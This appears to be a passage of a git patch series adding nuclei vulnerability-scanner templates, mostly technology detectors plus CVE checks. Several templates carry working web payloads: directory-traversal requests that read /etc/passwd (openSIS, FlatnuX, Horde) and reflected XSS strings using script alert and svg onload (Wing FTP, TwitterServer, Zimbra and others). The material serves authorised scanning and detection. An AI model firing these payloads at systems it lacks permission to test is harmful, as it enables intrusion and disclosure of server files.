a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml index b61b2bd930..5412177045 100644 --- a/vulnerabilities/other/opensis-lfi.yaml +++ b/vulnerabilities/other/opensis-lfi.yaml @@ -12,8 +12,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php " - - "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php " + - "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php" + - "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php" matchers-condition: and matchers: @@ -24,3 +24,4 @@ requests: - type: status status: + - 200 From 93e8844b7329fac95bc48830d0ecb39597072c1c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 08:34:38 +0700 Subject: [PATCH 1182/4083] Create froxlor-detect.yaml --- technologies/froxlor-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/froxlor-detect.yaml diff --git a/technologies/froxlor-detect.yaml b/technologies/froxlor-detect.yaml new file mode 100644 index 0000000000..b3336641ef --- /dev/null +++ b/technologies/froxlor-detect.yaml @@ -0,0 +1,24 @@ +id: froxlor-detect + +info: + name: Froxlor Detect + author: pikpikcu + severity: info + tags: tech,froxlor + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Froxlor Server Management Panel" + + - type: status + status: + - 200 From 241eff959cc827bcd22b387c823177a7ebdfbb96 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 27 Jul 2021 09:31:04 +0700 Subject: [PATCH 1183/4083] Create CVE-2012-4878.yaml --- cves/2012/CVE-2012-4878.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2012/CVE-2012-4878.yaml diff --git a/cves/2012/CVE-2012-4878.yaml b/cves/2012/CVE-2012-4878.yaml new file mode 100644 index 0000000000..79bf5f60d2 --- /dev/null +++ b/cves/2012/CVE-2012-4878.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-4878 + +info: + name: FlatnuX CMS - Directory Traversal + author: daffainfo + severity: high + description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. + reference: | + - https://www.exploit-db.com/exploits/37034 + - https://www.cvedetails.com/cve/CVE-2012-4878 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From f619caf26a16ed2fd446f9d3742160b2fc1f4328 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 10:23:23 +0700 Subject: [PATCH 1184/4083] Create CVE-2020-27735.yaml --- cves/2020/CVE-2020-27735.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-27735.yaml diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml new file mode 100644 index 0000000000..d2919d4cf3 --- /dev/null +++ b/cves/2020/CVE-2020-27735.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-27735 + +info: + name: Wing FTP's Web Interface XSS + author: pikpikcu + severity: medium + description: | + An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735 + tags: cve,cve2020,xss,wing-ftp + +requests: + - method: GET + path: + - "{{BaseURL}}/help/english/index.html?javascript:alert('{{randstr}}')" + + matchers-condition: and + matchers: + - type: word + words: + - "alert('{{randstr}}')" + part: body + + - type: status + status: + - 200 From 326c8265ef042526a26fec0fcd78bbea484dc9da Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 10:31:48 +0700 Subject: [PATCH 1185/4083] Create CVE-2020-35774.yaml --- cves/2020/CVE-2020-35774.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-35774.yaml diff --git a/cves/2020/CVE-2020-35774.yaml b/cves/2020/CVE-2020-35774.yaml new file mode 100644 index 0000000000..8ae5a28eea --- /dev/null +++ b/cves/2020/CVE-2020-35774.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-35774 + +info: + name: Twitter Server XSS + author: pikpikcu + severity: medium + description: | + server/handler/HistogramQueryHandler.scala in Twitter TwitterServer (aka twitter-server) before 20.12.0, in some configurations, allows XSS via the /histograms endpoint. + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774 + tags: cve,cve2020,xss,twitter-server + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/histograms?h=%3Cscript%3Ealert(%22{{randstr}}%22)%3C/script%3E&fmt=plot_cdf&log_scale=true" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 From 7ebdca25f7f5eda05f4fdcce22831218e4e1c66c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 10:47:02 +0700 Subject: [PATCH 1186/4083] Create sage-detect.yaml --- technologies/sage-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/sage-detect.yaml diff --git a/technologies/sage-detect.yaml b/technologies/sage-detect.yaml new file mode 100644 index 0000000000..5e8f704a2e --- /dev/null +++ b/technologies/sage-detect.yaml @@ -0,0 +1,24 @@ +id: sage-detect + +info: + name: Sage X3 Detect + author: pikpikcu + severity: info + tags: tech,sage + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/login/page" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Sage X3" + + - type: status + status: + - 200 From b75c2dde67670e76e9a77b9802063c0d830f36a7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 10:38:46 +0530 Subject: [PATCH 1187/4083] Update CVE-2020-35774.yaml --- cves/2020/CVE-2020-35774.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-35774.yaml b/cves/2020/CVE-2020-35774.yaml index 8ae5a28eea..18bb148c5b 100644 --- a/cves/2020/CVE-2020-35774.yaml +++ b/cves/2020/CVE-2020-35774.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/admin/histograms?h=%3Cscript%3Ealert(%22{{randstr}}%22)%3C/script%3E&fmt=plot_cdf&log_scale=true" + - "{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true" matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: status From b2f1863fd7d27afa3423b1b4f310aec0ccc369ed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 10:40:55 +0530 Subject: [PATCH 1188/4083] Update CVE-2020-35774.yaml --- cves/2020/CVE-2020-35774.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-35774.yaml b/cves/2020/CVE-2020-35774.yaml index 18bb148c5b..e772c16eec 100644 --- a/cves/2020/CVE-2020-35774.yaml +++ b/cves/2020/CVE-2020-35774.yaml @@ -24,3 +24,8 @@ requests: - type: status status: - 200 + + - type: word + part: header + words: + - text/html From caf6bb61c331e261a244a489b2020c4ea03b6a27 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 10:41:08 +0530 Subject: [PATCH 1189/4083] Update CVE-2020-27735.yaml --- cves/2020/CVE-2020-27735.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml index d2919d4cf3..d8530bbdd6 100644 --- a/cves/2020/CVE-2020-27735.yaml +++ b/cves/2020/CVE-2020-27735.yaml @@ -24,3 +24,8 @@ requests: - type: status status: - 200 + + - type: word + part: header + words: + - text/html From ddc251861fd59f19fdee2b64966e80a39125ccb3 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 12:21:52 +0700 Subject: [PATCH 1190/4083] Create CVE 2020-6171.yaml --- cves/2020/CVE 2020-6171.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2020/CVE 2020-6171.yaml diff --git a/cves/2020/CVE 2020-6171.yaml b/cves/2020/CVE 2020-6171.yaml new file mode 100644 index 0000000000..49568f33e3 --- /dev/null +++ b/cves/2020/CVE 2020-6171.yaml @@ -0,0 +1,31 @@ +id: CVE 2020-6171 + +info: + name: CLink Office v2 XSS + author: pikpikcu + severity: medium + description: | + A cross-site scripting (XSS) vulnerability in the index page of the CLink Office 2.0 management console allows remote attackers to inject arbitrary web script or HTML via the lang parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774 + tags: cve,cve2020,xss,clink-office + +requests: + - method: GET + path: + - "{{BaseURL}}?lang=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cp%20class=%22&p=1" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From 751626e435e1ef697f3369ceb39b5ba13e4ca1b6 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 12:24:17 +0700 Subject: [PATCH 1191/4083] Update CVE 2020-6171.yaml --- cves/2020/CVE 2020-6171.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE 2020-6171.yaml b/cves/2020/CVE 2020-6171.yaml index 49568f33e3..012a3b35df 100644 --- a/cves/2020/CVE 2020-6171.yaml +++ b/cves/2020/CVE 2020-6171.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | A cross-site scripting (XSS) vulnerability in the index page of the CLink Office 2.0 management console allows remote attackers to inject arbitrary web script or HTML via the lang parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774 + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-6171 tags: cve,cve2020,xss,clink-office requests: From c2012bf293fe156d3808ff5cb616c20b833e969a Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 12:32:32 +0700 Subject: [PATCH 1192/4083] Create CVE-2009-0932.yaml --- cves/2009/CVE-2009-0932.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2009/CVE-2009-0932.yaml diff --git a/cves/2009/CVE-2009-0932.yaml b/cves/2009/CVE-2009-0932.yaml new file mode 100644 index 0000000000..9cfbe39658 --- /dev/null +++ b/cves/2009/CVE-2009-0932.yaml @@ -0,0 +1,29 @@ + +id: CVE-2009-0932 + +info: + name: Horde - Horde_Image::factory driver Argument LFI + author: pikpikcu + severity: high + description: | + Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. + reference: | + - https://www.exploit-db.com/exploits/16154 + - https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2 + tags: cve,cve2009,horde,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 56b4ada4617be4a0adcbef25a67709f9e98dcc34 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 12:35:57 +0700 Subject: [PATCH 1193/4083] Update CVE-2009-0932.yaml --- cves/2009/CVE-2009-0932.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2009/CVE-2009-0932.yaml b/cves/2009/CVE-2009-0932.yaml index 9cfbe39658..5d4ccdc695 100644 --- a/cves/2009/CVE-2009-0932.yaml +++ b/cves/2009/CVE-2009-0932.yaml @@ -1,4 +1,3 @@ - id: CVE-2009-0932 info: From 0602e765f76f696cabe1e3e21ee32eb94fc59e5a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 11:17:26 +0530 Subject: [PATCH 1194/4083] Update and rename acontent-detect.yaml to achecker-detect.yaml --- technologies/{acontent-detect.yaml => achecker-detect.yaml} | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) rename technologies/{acontent-detect.yaml => achecker-detect.yaml} (76%) diff --git a/technologies/acontent-detect.yaml b/technologies/achecker-detect.yaml similarity index 76% rename from technologies/acontent-detect.yaml rename to technologies/achecker-detect.yaml index 5eae4dc7e4..3d1947b036 100644 --- a/technologies/acontent-detect.yaml +++ b/technologies/achecker-detect.yaml @@ -18,7 +18,9 @@ requests: - type: word part: body words: - - "AContent" + - ": Web Accessibility Checker" + - "AChecker - Copyright" + condition: and - type: status status: From 484da91bbfce72dbce7f0ac10d1b0f3a7f2c00a6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 11:22:43 +0530 Subject: [PATCH 1195/4083] Update achecker-detect.yaml --- technologies/achecker-detect.yaml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/technologies/achecker-detect.yaml b/technologies/achecker-detect.yaml index 3d1947b036..dd940e3eeb 100644 --- a/technologies/achecker-detect.yaml +++ b/technologies/achecker-detect.yaml @@ -1,16 +1,15 @@ -id: acontent-detect +id: achecker-detect info: - name: AContent Detect - author: pikpikcu + name: AChecker Detect + author: princechaddha severity: info - tags: tech,acontent + tags: tech,achecker requests: - method: GET path: - - "{{BaseURL}}/" - - "{{BaseURL}}/AContent/login.php" + - "{{BaseURL}}/checker/login.php" matchers-condition: and matchers: From 21dade847aba19ae24f1efcf34775ae71635bba4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 11:24:22 +0530 Subject: [PATCH 1196/4083] Create acontent-detect.yaml --- technologies/acontent-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/acontent-detect.yaml diff --git a/technologies/acontent-detect.yaml b/technologies/acontent-detect.yaml new file mode 100644 index 0000000000..26d7257616 --- /dev/null +++ b/technologies/acontent-detect.yaml @@ -0,0 +1,25 @@ +id: acontent-detect + +info: + name: AContent Detect + author: pikpikcu + severity: info + tags: tech,acontent + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/AContent/login.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "AContent" + + - type: status + status: + - 200 \ No newline at end of file From a2fc63b7ac07a131bd02537c9b5acffcd959bae0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 13:06:30 +0700 Subject: [PATCH 1197/4083] Create qcubed-xss.yaml --- vulnerabilities/other/qcubed-xss.yaml | 30 +++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/other/qcubed-xss.yaml diff --git a/vulnerabilities/other/qcubed-xss.yaml b/vulnerabilities/other/qcubed-xss.yaml new file mode 100644 index 0000000000..f1a122be87 --- /dev/null +++ b/vulnerabilities/other/qcubed-xss.yaml @@ -0,0 +1,30 @@ +id: qcubed-xss + +info: + name: Qcubed Reflected XSS + author: pikpikcu + severity: medium + reference: https://github.com/qcubed/qcubed/issues/1230 + tags: xss,qcubed + +requests: + - method: GET + path: + - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3Cscript%3Ealert(document.domain)%3B%3C/script%3E%3C%22" + - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3Cscript%3Ealert(document.domain)%3B%3C/script%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From ae7e4a8d0ac07613c5ff157d49c447137abc4eba Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 11:53:35 +0530 Subject: [PATCH 1198/4083] Update acontent-detect.yaml --- technologies/acontent-detect.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/technologies/acontent-detect.yaml b/technologies/acontent-detect.yaml index 26d7257616..1224fffece 100644 --- a/technologies/acontent-detect.yaml +++ b/technologies/acontent-detect.yaml @@ -10,16 +10,17 @@ requests: - method: GET path: - "{{BaseURL}}/" - - "{{BaseURL}}/AContent/login.php" - + redirects: true matchers-condition: and matchers: - type: word part: body words: - - "AContent" + - "AContent : Home" + - "AContent - Copyright 2010 by IDRC/IDI http://inclusivedesign.ca/" + condition: or - type: status status: - - 200 \ No newline at end of file + - 200 From b065fed3f178aa7c8f0597e584b9a5f2161e9b17 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 13:26:07 +0700 Subject: [PATCH 1199/4083] Create wondercms-detect --- technologies/wondercms-detect | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/wondercms-detect diff --git a/technologies/wondercms-detect b/technologies/wondercms-detect new file mode 100644 index 0000000000..370481143f --- /dev/null +++ b/technologies/wondercms-detect @@ -0,0 +1,25 @@ +id: wondercms-detect + +info: + name: WonderCMS Detect + author: pikpikcu + severity: info + tags: tech,wondercms + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Powered by WonderCMS" + - "https://www.wondercms.com" + + - type: status + status: + - 200 From 9f28ff8f9b2ace4b45085d7b5e8df670972eb5f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 11:57:30 +0530 Subject: [PATCH 1200/4083] Update qcubed-xss.yaml --- vulnerabilities/other/qcubed-xss.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/qcubed-xss.yaml b/vulnerabilities/other/qcubed-xss.yaml index f1a122be87..cae77f9cf8 100644 --- a/vulnerabilities/other/qcubed-xss.yaml +++ b/vulnerabilities/other/qcubed-xss.yaml @@ -10,14 +10,14 @@ info: requests: - method: GET path: - - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3Cscript%3Ealert(document.domain)%3B%3C/script%3E%3C%22" - - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3Cscript%3Ealert(document.domain)%3B%3C/script%3E%3C%22" + - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: status From 76a39c9ef506ed2f31e2680874054f0ec6ff7a39 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 11:58:42 +0530 Subject: [PATCH 1201/4083] Update CVE 2020-6171.yaml --- cves/2020/CVE 2020-6171.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE 2020-6171.yaml b/cves/2020/CVE 2020-6171.yaml index 012a3b35df..1e99f11860 100644 --- a/cves/2020/CVE 2020-6171.yaml +++ b/cves/2020/CVE 2020-6171.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}?lang=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cp%20class=%22&p=1" + - "{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1" matchers-condition: and matchers: - type: word words: - - '">' + - '">' part: body - type: status From 6d1660cfda90f7de9ec922ec080b348a625ff6ef Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 13:30:59 +0700 Subject: [PATCH 1202/4083] Create bigbluebutton-detect.yaml --- technologies/bigbluebutton-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/bigbluebutton-detect.yaml diff --git a/technologies/bigbluebutton-detect.yaml b/technologies/bigbluebutton-detect.yaml new file mode 100644 index 0000000000..bfe8188152 --- /dev/null +++ b/technologies/bigbluebutton-detect.yaml @@ -0,0 +1,24 @@ +id: bigbluebutton-detect + +info: + name: BigBlueButton Detect + author: pikpikcu + severity: info + tags: tech,bigbluebutton + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "BigBlueButton" + + - type: status + status: + - 200 From b19ae8e6f35883ebe6794e413ae24975aab76697 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 13:40:55 +0700 Subject: [PATCH 1203/4083] Create jeedom-detect.yaml --- technologies/jeedom-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/jeedom-detect.yaml diff --git a/technologies/jeedom-detect.yaml b/technologies/jeedom-detect.yaml new file mode 100644 index 0000000000..4154e6b7d0 --- /dev/null +++ b/technologies/jeedom-detect.yaml @@ -0,0 +1,24 @@ +id: jeedom-detect + +info: + name: Jeedom Detect + author: pikpikcu + severity: info + tags: tech,jeedom + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?v=d" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Jeedom" + + - type: status + status: + - 200 From 6f91b5d0529aae7a433ef4ef9b440d188df024fd Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 13:45:01 +0700 Subject: [PATCH 1204/4083] Create CVE-2020-9036.yaml --- cves/2020/CVE-2020-9036.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2020/CVE-2020-9036.yaml diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml new file mode 100644 index 0000000000..1b757a456f --- /dev/null +++ b/cves/2020/CVE-2020-9036.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-9036 + +info: + name: Jeedom through 4.0.38 allows XSS. + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9036 + tags: cve,cve2020,xss,jeedom + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22" + + matchers-condition: and + matchers: + - type: word + words: + - 'alert(document.domain)' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From 4972bc12e40a422698a17ea4225d56a1b80bd041 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 13:50:57 +0700 Subject: [PATCH 1205/4083] Create itop-detect.yaml --- technologies/itop-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/itop-detect.yaml diff --git a/technologies/itop-detect.yaml b/technologies/itop-detect.yaml new file mode 100644 index 0000000000..daf68e81e2 --- /dev/null +++ b/technologies/itop-detect.yaml @@ -0,0 +1,24 @@ +id: itop-detect + +info: + name: iTop Detect + author: pikpikcu + severity: info + tags: tech,itop + +requests: + - method: GET + path: + - "{{BaseURL}}/pages/UI.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "iTop login" + + - type: status + status: + - 200 From 520dd582e685865190a32131b4147bd03618a2c8 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 14:13:08 +0700 Subject: [PATCH 1206/4083] Create centreon-detect.yaml --- technologies/centreon-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/centreon-detect.yaml diff --git a/technologies/centreon-detect.yaml b/technologies/centreon-detect.yaml new file mode 100644 index 0000000000..c3ca5df6a4 --- /dev/null +++ b/technologies/centreon-detect.yaml @@ -0,0 +1,24 @@ +id: centreon-detect + +info: + name: Centreon Detect + author: pikpikcu + severity: info + tags: tech,centreon + +requests: + - method: GET + path: + - "{{BaseURL}}/centreon/index.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Centreon - IT & Network Monitoring" + + - type: status + status: + - 200 From 62df9585f930c7108413a2d123ae829e46640cff Mon Sep 17 00:00:00 2001 From: TheConciergeDev <65483817+TheConciergeDev@users.noreply.github.com> Date: Tue, 27 Jul 2021 09:28:54 +0200 Subject: [PATCH 1207/4083] Renamed yaml file Added missing "-" in filename --- cves/2020/{CVE 2020-6171.yaml => CVE-2020-6171.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2020/{CVE 2020-6171.yaml => CVE-2020-6171.yaml} (100%) diff --git a/cves/2020/CVE 2020-6171.yaml b/cves/2020/CVE-2020-6171.yaml similarity index 100% rename from cves/2020/CVE 2020-6171.yaml rename to cves/2020/CVE-2020-6171.yaml From 317a63ec9c2602c0a07c69bf980c3e4b767eb0b3 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 14:34:36 +0700 Subject: [PATCH 1208/4083] Create CVE-2018-14013.yaml --- cves/2018/CVE-2018-14013.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2018/CVE-2018-14013.yaml diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml new file mode 100644 index 0000000000..e7c1f61f6e --- /dev/null +++ b/cves/2018/CVE-2018-14013.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-14013 + +info: + name: Zimbra XSS. + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 + tags: cve,cve2018,xss,zimbra + +requests: + - method: GET + path: + - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From 4a1311212590786c08aa50176ae45f27a43445f2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 13:33:41 +0530 Subject: [PATCH 1209/4083] Update CVE-2020-27735.yaml --- cves/2020/CVE-2020-27735.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml index d8530bbdd6..a8adffe794 100644 --- a/cves/2020/CVE-2020-27735.yaml +++ b/cves/2020/CVE-2020-27735.yaml @@ -18,7 +18,7 @@ requests: matchers: - type: word words: - - "alert('{{randstr}}')" + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From 338fbb8663e21083e7d4a32a7577fd2225fd477b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 16:14:15 +0700 Subject: [PATCH 1216/4083] Create gespage-detect.yaml --- technologies/gespage-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/gespage-detect.yaml diff --git a/technologies/gespage-detect.yaml b/technologies/gespage-detect.yaml new file mode 100644 index 0000000000..f64facbc02 --- /dev/null +++ b/technologies/gespage-detect.yaml @@ -0,0 +1,24 @@ +id: gespage-detect + +info: + name: Gespage Detect + author: pikpikcu + severity: info + tags: tech,gespage + +requests: + - method: GET + path: + - "{{BaseURL}}/gespage/webapp/login.xhtml" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Login utilisateur Gespage" + + - type: status + status: + - 200 From 315215aa028dbf193ea217f69132309e467ba26b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 16:51:01 +0700 Subject: [PATCH 1217/4083] Create CVE-2017-6090.yaml --- cves/2017/CVE-2017-6090.yaml | 48 ++++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 cves/2017/CVE-2017-6090.yaml diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml new file mode 100644 index 0000000000..81ec20fdd7 --- /dev/null +++ b/cves/2017/CVE-2017-6090.yaml @@ -0,0 +1,48 @@ +id: CVE-2017-6090 + +info: + name: PhpCollab (unauthenticated) Arbitrary File Upload + author: pikpikcu + severity: critical + tags: cve,cve2017,phpCollab,rce + 